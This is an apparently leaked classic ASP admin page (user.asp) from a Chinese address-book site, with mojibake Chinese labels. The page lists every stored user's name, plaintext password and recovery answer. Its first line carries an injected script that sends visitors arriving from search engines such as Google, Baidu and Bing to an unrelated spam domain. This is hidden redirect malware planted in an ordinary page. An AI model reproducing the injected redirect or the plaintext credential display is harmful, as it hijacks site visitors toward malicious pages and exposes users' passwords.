d:\wwwroot\wuchunhua\ͨѶ¼\admin\user.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!-- #include file="chk.asp" -->
002: <!-- #include file="conn.asp" -->
003: <HTML><HEAD><TITLE>ºǫ́¹ÜÀíÊ×Ò³</TITLE>
004: <SCRIPT language=JavaScript>
005: function CheckSel(Voption,Value)
006: {
007:    var obj = document.getElementById(Voption);
008:    for (i=0;i<obj.length;i++){
009:       if (obj.options[i].value==Value){
010:       obj.options[i].selected=true;
011:       break;
012:       }
013:    }
014: }
015: function chang_size(num,objname)
016: {
017:    var obj=document.getElementById(objname)
018:    if (parseInt(obj.rows)+num>=3) {
019:       obj.rows = parseInt(obj.rows) + num;  
020:    }
021:    if (num>0)
022:    {
023:       obj.width="90%";
024:    }
025: }
026: </SCRIPT>
027:
028: <STYLE type=text/css>#showpage {
029:    CLEAR: both; WIDTH: 100%; TEXT-ALIGN: center
030: }
031: </STYLE>
032:
033: <META http-equiv=Content-Type content="text/html; charset=gb2312"><LINK
034: href="images/admin_STYLE.css" rel=stylesheet>
035: <META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD>
036: <BODY class=bgcolor leftMargin=2 topMargin=0 marginheight="0"
037: marginwidth="0"><BR>
038: <TABLE class=border cellSpacing=1 cellPadding=2 width="98%" align=center
039: border=0>
040:   <TBODY>
041:   <TR align=middle>
042:     <TD class=topbg width=300 height=25>
043:       <DIV align=left><b><font size="3">Óû§¹ÜÀí</font></b></DIV></TD></TR></TBODY></TABLE><BR>
044: <TABLE class=border cellSpacing=1 cellPadding=2 width="865" align=center
045: bgColor=#ffffff border=0 height="46">
046:   <TBODY>
047:   <TR align=middle>
048:     <TD class=topbg height=22 width="215">ÐÕÃû<TD class=topbg height=22 width="215">
049:     ÃÜÂë<TD class=topbg height=22 width="216">ÃÜÂëÌáʾÎÊÌâ´ð°¸<TD class=topbg height=22 width="216">
050:     ²Ù×÷
051: <%
052: set rs=server.createobject("adodb.recordset")
053: rs.Open "Select * from [user]",conn,1,1
054: If rs.Bof Or rs.Eof then
055:   Response.Write "ûÓÐÊý¾Ý£¡"
056: Else
057:   While not rs.eof
058: %
>
059:     <TR>
060:     <TD class=tdbg height=1 width="215" align="center">¡¡<%=rs("name")%></TD>
061:     <TD class=tdbg height=1 width="215" align="center">¡¡<%=rs("pwd")%></TD>
062:     <TD class=tdbg height=1 width="216" align="center">¡¡<%=rs("pwdanswer")%></TD>
063:     <TD class=tdbg height=1 width="216" align="center">
064:     <a href="user_edit.asp?id=<%=rs("id")%>">ÐÞ¸ÄÃÜÂë</a>&nbsp; |&nbsp;
065:     <a href="user_del.asp?id=<%=rs("id")%>">ɾ³ý</a></TD></TR>
066: <%
067: rs.MoveNext
068: Wend
069: End If
070: rs.Close
071: Set rs=nothing
072: %
>
073:   </TBODY></TABLE>¡¡</BODY></HTML>
074:
075: